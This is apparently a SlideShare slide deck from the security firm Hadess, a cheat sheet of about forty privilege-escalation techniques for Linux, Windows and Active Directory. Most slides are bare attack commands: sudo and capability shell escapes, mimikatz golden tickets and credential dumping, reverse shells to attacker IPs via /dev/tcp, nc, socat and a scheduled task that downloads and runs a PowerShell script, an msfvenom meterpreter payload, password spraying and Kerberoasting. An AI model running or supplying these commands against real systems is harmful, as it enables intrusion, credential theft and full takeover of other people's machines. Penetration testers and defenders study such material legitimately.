SlideShare a Scribd company logo

40 Methods for Privilege Escalation Part 1

Hadess
Hadess

40 Methods for Privilege Escalation - Part 1 Privilege escalation is the act of exploiting a bug, a design flaw, or a configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The first part of Privilege escalation methods with complete Descriptions: 1. Abusing Sudo Binaries 2. Abusing Scheduled Tasks 3. Golden Ticket With Scheduled Tasks 4. Abusing Interpreter Capabilities 5. Abusing Binary Capabilities 6. Abusing ActiveSessions Capabilities 7. Escalate with TRUSTWORTHY in SQL Server 8. Abusing Mysql run as root 9. Abusing journalctl 10. Abusing VDS 11. Abusing Browser 12. Abusing LDAP 13. LLMNR Poisoning 14. Abusing Certificate Services 15. MySQL UDF Code Injection 16. Impersonation Token with ImpersonateLoggedOnuser 17. Impersonation Token with SeImpersontePrivilege 18. Impersonation Token with SeLoadDriverPrivilege 19. OpenVPN Credentials 20. Bash History 21. Package Capture 22. NFS Root Squashing 23. Abusing Access Control List 24. Escalate With SeBackupPrivilege 25. Escalate With SeImpersonatePrivilege 26. Escalate With SeLoadDriverPrivilege 27. Escalate With ForceChangePassword 28. Escalate With GenericWrite 29. Abusing GPO 30. Pass-the-Ticket 31. Golden Ticket 32. Abusing Splunk Universal Forwarder 33. Abusing Gdbus 34. Abusing Trusted DC 35. NTLM Relay 36. Exchange Relay 37. Dumping with diskshadow 38. Dumping with vssadmin 39. Password Spraying 40. AS-REP Roasting Kerberoasting

Technology
1 of 45
Download to read offline
40 METHODS FOR PRIVILEGE ESCALATION PART 1 HADESS | SECURE AGILE DEVELOPMENT WWW.HADESS.IO
Domain: No Local Admin: Yes OS: Linux Type: Abusing Privileged Files sudo vim -c ':!/bin/bash' sudo find / etc/passwd -exec /bin/bash ; echo "os.execute('/bin/bash/')" > /tmp/shell.nse && sudo nmap -- script=/tmp/shell.nse sudo env /bin/bash sudo awk 'BEGIN {system("/bin/bash")}' sudo perl -e 'exec "/bin/bash";' sudo python -c 'import pty;pty.spawn("/bin/bash")' sudo less /etc/hosts - !bash sudo man man - !bash sudo ftp - ! /bin/bash Attacker = socat file:`tty`,raw,echo=0 tcp-listen:1234 Victim = sudo socat exec:'sh -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.105:1234 echo test > notes.txt sudo zip test.zip notes.txt -T --unzip-command="sh -c /bin/bash" sudo gcc -wrapper /bin/bash,-s . ABUSING SUDO BINARIES HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Linux Type: Abusing Scheduled Tasks echo 'chmod +s /bin/bash' > /home/user/systemupdate.sh chmod +x /home/user/systemupdate.sh Wait a while /bin/bash -p id && whoami ABUSING SCHEDULED TASKS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Yes Local Admin: Yes OS: Windows Type: Abusing Scheduled Tasks 1.mimikatz# token::elevate 2.mimikatz# vault::cred /patch 3.mimikatz# lsadump::lsa /patch 4.mimikatz# kerberos::golden /user:Administrator /rc4:<Administrator NTLM(step 3)> /domain:<DOMAIN> /sid:<USER SID> /sids:<Administrator SIDS> /ticket:<OUTPUT TICKET PATH> 5.powercat -l -v -p 443 6.schtasks /create /S DOMAIN /SC Weekly /RU "NT AuthoritySYSTEM" /TN "enterprise" /TR "powershell.exe-c 'iex (iwr http://10.10.10.10/reverse.ps1)'” 7.schtasks /run /s DOMAIN /TN "enterprise” GOLDEN TICKET WITH SCHEDULED TASKS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Linux Type: Abusing Capabilities getcap -r / 2>/dev/null /usr/bin/python2.6 = cap_setuid+ep /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")' id && whoami getcap -r / 2>/dev/null /usr/bin/perl = cap_setuid+ep /usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";' id && whoami 1. a. b. c. 2. a. b. c. ABUSING INTERPRETER CAPABILITIES HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Linux Type: Abusing Capabilities getcap -r / 2>/dev/null /usr/bin/tar = cap dac read search+ep /usr/bin/tar -cvf key.tar /root/.ssh/id_rsa /usr/bin/tar -xvf key.tar openssl req -engine /tmp/priv.so /bin/bash -p id && whoami 1. 2. 3. 4. 5. 6. 7. ABUSING BINARY CAPABILITIES HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Abusing Capabilities https://raw.githubusercontent.com/EmpireProject/Empire/master/data /module_source/lateral_movement/Invoke-SQLOSCmd.ps1 . .Heidi.ps1 Invoke-SQLOCmd -Verbose -Command “net localgroup administrators user1 /add” -Instance COMPUTERNAME 1. 2. 3. ABUSING ACTIVESESSIONS CAPABILITIES HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Yes Local Admin: Yes OS: Windows Type: Abusing Capabilities 1. . .PowerUpSQL.ps1 2. Get-SQLInstanceLocal -Verbose 3. (Get-SQLServerLinkCrawl -Verbos -Instance "10.10.10.10" -Query 'select * from master..sysservers').customer.query 4. USE "master"; SELECT *, SCHEMA_NAME("schema_id") AS 'schema' FROM "master"."sys"."objects" WHERE "type" IN ('P', 'U', 'V', 'TR', 'FN', 'TF, 'IF'); execute('sp_configure "xp_cmdshell",1;RECONFIGURE') at "<DOMAIN><DATABASE NAME>" 5. powershell -ep bypass 6. Import-Module .powercat.ps1 7. powercat -l -v -p 443 -t 10000 8. SELECT *, SCHEMA_NAME("schema_id") AS 'schema' FROM "master"."sys"."objects" WHERE "type" IN ('P', 'U', 'V', 'TR', 'FN', 'TF, 'IF'); execute('sp_configure "xp_cmdshell",1;RECONFIGURE') at "<DOMAIN><DATABASE NAME>" execute('exec master..xp_cmdshell "10.10.10.10reverse.exe"') at "<DOMAIN> <DATABASE NAME>" 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 14. ESCALATE WITH TRUSTWORTHY IN SQL SERVER HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Yes Local Admin: Yes OS: Windows Type: Abusing Services ps aux | grep root mysql -u root -p ! chmod +s /bin/bash Exit /bin/bash -p id && whoami 1. 2. 3. 4. 5. 6. ABUSING MYSQL RUN AS ROOT HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Linux Type: Abusing Services Journalctl !/bin/sh 1. 2. ABUSING JOURNALCTL HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Abusing Services . .PowerUp.ps1 Invoke-ServiceAbuse -Name ‘vds’ -UserName ‘domainuser1’ 1. 2. ABUSING VDS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Abusing Services . .PowerUp.ps1 Invoke-ServiceAbuse -Name ‘browser’ -UserName ‘domainuser1’ 1. 2. ABUSING BROWSER HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Yes Local Admin: Yes OS: Linux Type: Abusing Services 0. exec ldapmodify -x -w PASSWORD 1. paste this dn: cn=openssh-lpk,cn=schema,cn=config objectClass: olcSchemaConfig cn: openssh-lpk olcAttributeTypes: ( 1.3.6.1.4.1.24552.500.1.1.1.13 NAME 'sshPublicKey' DESC 'MANDATORY: OpenSSH Public key' EQUALITY octetStringMatch SYNTAX 1.3.6.1.4.1.1466.115.121.1.40 ) olcObjectClasses: ( 1.3.6.1.4.1.24552.500.1.1.2.0 NAME 'ldapPublicKey' SUP top AUXILIARY DESC 'MANDATORY: OpenSSH LPK objectclass' MAY ( sshPublicKey $ uid ) ) 2. exec ldapmodify -x -w PASSWORD 3. paste this dn: uid=UID,ou=users,ou=linux,ou=servers,dc=DC,dc=DC changeType: modify add: objectClass objectClass: ldapPublicKey - add: sshPublicKey sshPublicKey: content of id_rsa.pub - replace: EVIL GROUP ID uidNumber: CURRENT USER ID - replace: EVIL USER ID gidNumber: CURRENT GROUP ID 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 14. 15. 16. 17. 18. 19. 20. 21. 22. 23. 24. 25. 26. 27. 28. 29. ABUSING LDAP HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Yes Local Admin: Y/N OS: Windows Type: Abusing Services 1.responder -I eth1 -v 2.create Book.url [InternetShortcut] URL=https://facebook.com IconIndex=0 IconFile=attacker_ipnot_found.ico 1. 2. 3. 4. 5. 6. LLMNR POISONING HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Yes Local Admin: Y/N OS: Windows Type: Abusing Services adcspwn.exe --adcs <cs server> --port [local port] --remote [computer] adcspwn.exe --adcs cs.pwnlab.local adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001 adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local -- output C:Tempcert_b64.txt adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local -- username pwnlab.localmranderson --password The0nly0ne! --dc dc.pwnlab.local 1. 2. 3. 4. 5. ABUSING CERTIFICATE SERVICES HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Yes Local Admin: Yes OS: Linux Type: Injection mysql -u root -p mysql> use mysql; mysql> create table admin(line blob); mysql> insert into admin values(load_file('/tmp/lib_mysqludf_sys.so')); mysql> select * from admin into dumpfile '/usr/lib/lib_mysqludf_sys.so'; mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so'; mysql> select sys_exec('bash -i >& /dev/tcp/10.10.10.10/9999 0>&1'); 1. 2. 3. 4. 5. 6. 7. MYSQL UDF CODE INJECTION HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Injection 1.SharpImpersonation.exe user:<user> shellcode:<URL> 2.SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser 1. 2. IMPERSONATION TOKEN WITH IMPERSONATELOGGEDONUSER HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Injection 1.execute-assembly sweetpotato.exe -p beacon.exe 1. IMPERSONATION TOKEN WITH SEIMPERSONTEPRIVILEGE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Injection 1.EOPLOADDRIVER.exe SystemCurrentControlSetMyService C:UsersUsernameDesktopDriver.sys IMPERSONATION TOKEN WITH SELOADDRIVERPRIVILEGE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows/Linux Type: Enumeration & Hunt locate *.ovpn 1. OPENVPN CREDENTIALS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows/Linux Type: Enumeration & Hunt history cat /home/<user>/.bash_history cat ~/.bash_history | grep -i passw 1. 2. 3. BASH HISTORY HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows/Linux Type: Sniff tcpdump -nt -r capture.pcap -A 2>/dev/null | grep -P 'pwd=' 1. PACKAGE CAPTURE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Yes Local Admin: Yes OS: Linux Type: Remote Procedure Calls (RPC) showmount -e <victim_ip> mkdir /tmp/mount mount -o rw,vers=2 <victim_ip>:/tmp /tmp/mount cd /tmp/mount cp /bin/bash . chmod +s bash 1. 2. 3. 4. 5. 6. NFS ROOT SQUASHING HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Yes Local Admin: Yes OS: Windows Type: Abuse Privilege $user = "megacorpjorden" $folder = "C:Usersadministrator" $acl = get-acl $folder $aclpermissions = $user, "FullControl", "ContainerInherit, ObjectInherit", "None", "Allow" $aclrule = new-object System.Security.AccessControl.FileSystemAccessRule $aclpermissions $acl.AddAccessRule($aclrule) set-acl -path $folder -AclObject $acl get-acl $folder | folder 1. 2. 3. 4. 5. 6. 7. 8. ABUSING ACCESS CONTROL LIST HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Yes Local Admin: Yes OS: Windows Type: Abuse Privilege import-module .SeBackupPrivilegeUtils.dll import-module .SeBackupPrivilegeCmdLets.dll Copy-FileSebackupPrivilege z:WindowsNTDSntds.dit C:tempndts.dit 1. 2. 3. ESCALATE WITH SEBACKUPPRIVILEGE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Yes Local Admin: Yes OS: Windows Type: Abuse Privilege https://github.com/dievus/printspoofer printspoofer.exe -i -c "powershell -c whoami" 1. 2. ESCALATE WITH SEIMPERSONATEPRIVILEGE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Yes Local Admin: Yes OS: Windows Type: Abuse Privilege FIRST: Download https://github.com/FuzzySecurity/Capcom- Rootkit/blob/master/Driver/Capcom.sys Download https://raw.githubusercontent.com/TarlogicSecurity/EoPLoadDriver/master/eoploaddri ver.cpp Download https://github.com/tandasat/ExploitCapcom change ExploitCapcom.cpp line 292 TCHAR CommandLine[] = TEXT("C:Windowssystem32cmd.exe"); to TCHAR CommandLine[] = TEXT("C:testshell.exe"); then compile ExploitCapcom.cpp and eoploaddriver.cpp to .exe SECOND: 1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f exe > shell.exe 2. .eoploaddriver.exe SystemCurrentControlSetMyService C:testcapcom.sys 3. .ExploitCapcom.exe 4. in msf exec `run` ESCALATE WITH SELOADDRIVERPRIVILEGE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Yes Local Admin: Yes OS: Windows Type: Abuse Privilege https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 Import-Module .PowerView_dev.ps1 Set-DomainUserPassword -Identity user1 -verbose Enter-PSSession -ComputerName COMPUTERNAME -Credential “” ESCALATE WITH FORCECHANGEPASSWORD HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Yes Local Admin: Yes OS: Windows Type: Abuse Privilege $pass = ConvertTo-SecureString 'Password123#' -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential('DOMAINMASTER USER'), $pass) Set-DomainObject -Credential $creds USER1 -Clear serviceprincipalname Set-DomainObject -Credential $creds -Identity USER1 -SET @{serviceprincipalname='none/fluu'} .Rubeus.exe kerberoast /domain:<DOMAIN> ESCALATE WITH GENERICWRITE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Yes Local Admin: Yes OS: Windows Type: Abuse Privilege 1..SharpGPOAbuse.exe --AddComputerTask --Taskname "Update" --Author DOMAIN <USER> --Command "cmd.exe" --Arguments "/c net user Administrator Password!@# /domain" --GPOName "ADDITIONAL DC CONFIGURATION" ABUSING GPO HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Yes Local Admin: Y/N OS: Windows Type: Abuse Ticket 1..Rubeus.exe asktgt /user:<USET>$ /rc4:<NTLM HASH> /ptt 2.klist PASS-THE-TICKET HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Yes Local Admin: Y/N OS: Windows Type: Abuse Ticket 1.mimikatz # lsadump::dcsync /user:<USER> 2.mimikatz # kerberos::golden /user:<USER> /domain:</DOMAIN> /sid:<OBJECT SECURITY ID> /rce:<NTLM HASH> /id:<USER ID> GOLDEN TICKET HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Yes Local Admin: Y/N OS: Linux/Windows Type: Abuse Channel python PySplunkWhisperer2_remote.py --lhost 10.10.10.5 --host 10.10.15.20 -- username admin --password admin --payload '/bin/bash -c "rm /tmp/luci11;mkfifo /tmp/luci11;cat /tmp/luci11|/bin/sh -i 2>&1|nc 10.10.10.5 5555 >/tmp/luci11"' ABUSING SPLUNK UNIVERSAL FORWARDER HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Linux Type: Abuse Channel gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/authorized_keys /root/.ssh/authorized_keys true ABUSING GDBUS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Yes Local Admin: Y/N OS: Windows Type: Abuse Channel Find user in First DC If port 6666 enabled proxychains evil-winrm -u user -p 'pass' -i 10.100.9.253 -P 6666 . mimikatz. exe "privilege:: debug" "sekurlsa:: logonpasswords" "token:: elevate" *lsadump:: secrets* *exit" proxychains evil-winrm -u Administrator -p 'pass dumped in step 4' -i 10.100.10.100 -P 6666 1. 2. 3. 4. 5. ABUSING TRUSTED DC HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Yes Local Admin: Y/N OS: Windows Type: NTLM responder -I eth1 -v ntlmrelayx.py … 1. 2. NTLM RELAY HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Yes Local Admin: Y/N OS: Windows Type: NTLM responder -I eth1 -v ./exchangeRelayx.py … 1. 2. EXCHANGE RELAY HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Yes Local Admin: Y/N OS: Windows Type: Dumping 1. priv.txt contain SET CONTEXT PERSISTENT NOWRITERSp add volume c: alias 0xprashantp createp expose %0xprashant% z:p 2. exec with diskshadow /s priv.txt DUMPING WITH DISKSHADOW HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Yes Local Admin: Y/N OS: Windows Type: Dumping vssadmin create shadow /for=C: copy ? GLOBALROOTDeviceHarddiskVolumeShadowCopy1WindowsNTDSNTDS.dit C:ShadowCopy copy ? GLOBALROOTDeviceHarddiskVolumeShadowCopy1WindowsSystem32configSYS TEM C:ShadowCopy./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt Password123 DUMPING WITH VSSADMIN HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Yes Local Admin: Y/N OS: Windows Type: Spraying ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt Password123 PASSWORD SPRAYING HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Yes Local Admin: Y/N OS: Windows Type: Kerberos .Rubeus.exe asreproast AS-REP ROASTING HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Yes Local Admin: Y/N OS: Windows Type: Kerberos GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 -- kerberoast output.txt KERBEROASTING HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
HADESS | SECURE AGILE DEVELOPMENT About Hadess Savior of your Business to combat cyber threats Hadess performs offensive cybersecurity services through infrastructures and software that include vulnerability analysis, scenario attack planning, and implementation of custom integrated preventive projects. We organized our activities around the prevention of corporate, industrial, and laboratory cyber threats. Contact Us To request additional information about Hadess’s services, please fill out the form below. A Hadess representative will contact you shortly. Email: Marketing@hadess.io Phone No. +989362181112 Company No. +982128427515 +982177873383 Website: www.hadess.io hadess_security
HADESS | SECURE AGILE DEVELOPMENT Hadess Products and Services Fully assess your organization’s threat detection and response capabilities with a simulated cyber-attack. Penetration Testing | PROTECTION PRO Fully assess your organization’s threat detection and response capabilities with a simulated cyber-attack. Red Teaming Operation | PROTECTION PRO Identifying and helping to address hidden weaknesses in your organization’s security. RASP | Protect Applications and APIs Anywhere Identifying and helping to address hidden weaknesses in your Applications. SAST | Audit Your Products
HADESS Secure Agile Development

Recommended

74 Methods for Privilege Escalation Part 2
74 Methods for Privilege Escalation Part 274 Methods for Privilege Escalation Part 2
74 Methods for Privilege Escalation Part 2Hadess
 
Windows persistence presentation
Windows persistence presentationWindows persistence presentation
Windows persistence presentationOlehLevytskyi1
 
What we-don't-know
What we-don't-knowWhat we-don't-know
What we-don't-knowMarian Marinov
 
IT Automation with Ansible
IT Automation with AnsibleIT Automation with Ansible
IT Automation with AnsibleRayed Alrashed
 
How hackers attack networks
How hackers attack networksHow hackers attack networks
How hackers attack networksAdeel Javaid
 
Automating Compliance with InSpec - Chef Singapore Meetup
Automating Compliance with InSpec - Chef Singapore MeetupAutomating Compliance with InSpec - Chef Singapore Meetup
Automating Compliance with InSpec - Chef Singapore MeetupMatt Ray
 
Linux Containers From Scratch
Linux Containers From ScratchLinux Containers From Scratch
Linux Containers From Scratchjoshuasoundcloud
 
Debugging Network Issues
Debugging Network IssuesDebugging Network Issues
Debugging Network IssuesApcera
 

Recommended

74 Methods for Privilege Escalation Part 2
74 Methods for Privilege Escalation Part 274 Methods for Privilege Escalation Part 2
74 Methods for Privilege Escalation Part 2Hadess
 
Windows persistence presentation
Windows persistence presentationWindows persistence presentation
Windows persistence presentationOlehLevytskyi1
 
What we-don't-know
What we-don't-knowWhat we-don't-know
What we-don't-knowMarian Marinov
 
IT Automation with Ansible
IT Automation with AnsibleIT Automation with Ansible
IT Automation with AnsibleRayed Alrashed
 
How hackers attack networks
How hackers attack networksHow hackers attack networks
How hackers attack networksAdeel Javaid
 
Automating Compliance with InSpec - Chef Singapore Meetup
Automating Compliance with InSpec - Chef Singapore MeetupAutomating Compliance with InSpec - Chef Singapore Meetup
Automating Compliance with InSpec - Chef Singapore MeetupMatt Ray
 
Linux Containers From Scratch
Linux Containers From ScratchLinux Containers From Scratch
Linux Containers From Scratchjoshuasoundcloud
 
Debugging Network Issues
Debugging Network IssuesDebugging Network Issues
Debugging Network IssuesApcera
 
Death matchtournament del2014
Death matchtournament del2014Death matchtournament del2014
Death matchtournament del2014Nabil Munawar
 
Open Source Virtualization Hacks
Open Source Virtualization HacksOpen Source Virtualization Hacks
Open Source Virtualization HacksNiel Bornstein
 
Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - RoutersLogicaltrust pl
 
Filip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersFilip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersYury Chemerkin
 
Linux Hardening - nullhyd
Linux Hardening - nullhydLinux Hardening - nullhyd
Linux Hardening - nullhydn|u - The Open Security Community
 
Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingseastorm44
 
NAS Botnet Revealed - Mining Bitcoin
NAS Botnet Revealed - Mining Bitcoin NAS Botnet Revealed - Mining Bitcoin
NAS Botnet Revealed - Mining Bitcoin Davide Cioccia
 
Advanced Level Training on Koha / TLS (ToT)
Advanced Level Training on Koha / TLS (ToT)Advanced Level Training on Koha / TLS (ToT)
Advanced Level Training on Koha / TLS (ToT)Ata Rehman
 
The Modern Developer Toolbox
The Modern Developer ToolboxThe Modern Developer Toolbox
The Modern Developer ToolboxPablo Godel
 
2011-03 Developing Windows Exploits
2011-03 Developing Windows Exploits 2011-03 Developing Windows Exploits
2011-03 Developing Windows Exploits Raleigh ISSA
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesTrowalts
 
Chef - industrialize and automate your infrastructure
Chef - industrialize and automate your infrastructureChef - industrialize and automate your infrastructure
Chef - industrialize and automate your infrastructureMichaël Lopez
 
InSpec Workshop at Velocity London 2018
InSpec Workshop at Velocity London 2018InSpec Workshop at Velocity London 2018
InSpec Workshop at Velocity London 2018Mandi Walls
 
Porting your favourite cmdline tool to Android
Porting your favourite cmdline tool to AndroidPorting your favourite cmdline tool to Android
Porting your favourite cmdline tool to AndroidVlatko Kosturjak
 
PHP selber bauen
PHP selber bauenPHP selber bauen
PHP selber bauenWalter Ebert
 
Anton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is HackedAnton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is HackedAnton Chuvakin
 
bh-us-02-murphey-freebsd
bh-us-02-murphey-freebsdbh-us-02-murphey-freebsd
bh-us-02-murphey-freebsdwebuploader
 
Lifnaaaaaa e
Lifnaaaaaa eLifnaaaaaa e
Lifnaaaaaa ehenelpj
 
Docker Security workshop slides
Docker Security workshop slidesDocker Security workshop slides
Docker Security workshop slidesDocker, Inc.
 
Linux advanced privilege escalation
Linux advanced privilege escalationLinux advanced privilege escalation
Linux advanced privilege escalationJameel Nabbo
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 

More Related Content

Similar to 40 Methods for Privilege Escalation Part 1

Death matchtournament del2014
Death matchtournament del2014Death matchtournament del2014
Death matchtournament del2014Nabil Munawar
 
Open Source Virtualization Hacks
Open Source Virtualization HacksOpen Source Virtualization Hacks
Open Source Virtualization HacksNiel Bornstein
 
Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - RoutersLogicaltrust pl
 
Filip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersFilip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersYury Chemerkin
 
Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingseastorm44
 
NAS Botnet Revealed - Mining Bitcoin
NAS Botnet Revealed - Mining Bitcoin NAS Botnet Revealed - Mining Bitcoin
NAS Botnet Revealed - Mining Bitcoin Davide Cioccia
 
Advanced Level Training on Koha / TLS (ToT)
Advanced Level Training on Koha / TLS (ToT)Advanced Level Training on Koha / TLS (ToT)
Advanced Level Training on Koha / TLS (ToT)Ata Rehman
 
The Modern Developer Toolbox
The Modern Developer ToolboxThe Modern Developer Toolbox
The Modern Developer ToolboxPablo Godel
 
2011-03 Developing Windows Exploits
2011-03 Developing Windows Exploits 2011-03 Developing Windows Exploits
2011-03 Developing Windows Exploits Raleigh ISSA
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesTrowalts
 
Chef - industrialize and automate your infrastructure
Chef - industrialize and automate your infrastructureChef - industrialize and automate your infrastructure
Chef - industrialize and automate your infrastructureMichaël Lopez
 
InSpec Workshop at Velocity London 2018
InSpec Workshop at Velocity London 2018InSpec Workshop at Velocity London 2018
InSpec Workshop at Velocity London 2018Mandi Walls
 
Porting your favourite cmdline tool to Android
Porting your favourite cmdline tool to AndroidPorting your favourite cmdline tool to Android
Porting your favourite cmdline tool to AndroidVlatko Kosturjak
 
Anton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is HackedAnton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is HackedAnton Chuvakin
 
bh-us-02-murphey-freebsd
bh-us-02-murphey-freebsdbh-us-02-murphey-freebsd
bh-us-02-murphey-freebsdwebuploader
 
Lifnaaaaaa e
Lifnaaaaaa eLifnaaaaaa e
Lifnaaaaaa ehenelpj
 
Docker Security workshop slides
Docker Security workshop slidesDocker Security workshop slides
Docker Security workshop slidesDocker, Inc.
 
Linux advanced privilege escalation
Linux advanced privilege escalationLinux advanced privilege escalation
Linux advanced privilege escalationJameel Nabbo
 

Similar to 40 Methods for Privilege Escalation Part 1 (20)

Death matchtournament del2014
Death matchtournament del2014Death matchtournament del2014
Death matchtournament del2014
 
Open Source Virtualization Hacks
Open Source Virtualization HacksOpen Source Virtualization Hacks
Open Source Virtualization Hacks
 
Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers
 
Filip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersFilip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routers
 
Linux Hardening - nullhyd
Linux Hardening - nullhydLinux Hardening - nullhyd
Linux Hardening - nullhyd
 
Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testing
 
NAS Botnet Revealed - Mining Bitcoin
NAS Botnet Revealed - Mining Bitcoin NAS Botnet Revealed - Mining Bitcoin
NAS Botnet Revealed - Mining Bitcoin
 
Advanced Level Training on Koha / TLS (ToT)
Advanced Level Training on Koha / TLS (ToT)Advanced Level Training on Koha / TLS (ToT)
Advanced Level Training on Koha / TLS (ToT)
 
The Modern Developer Toolbox
The Modern Developer ToolboxThe Modern Developer Toolbox
The Modern Developer Toolbox
 
2011-03 Developing Windows Exploits
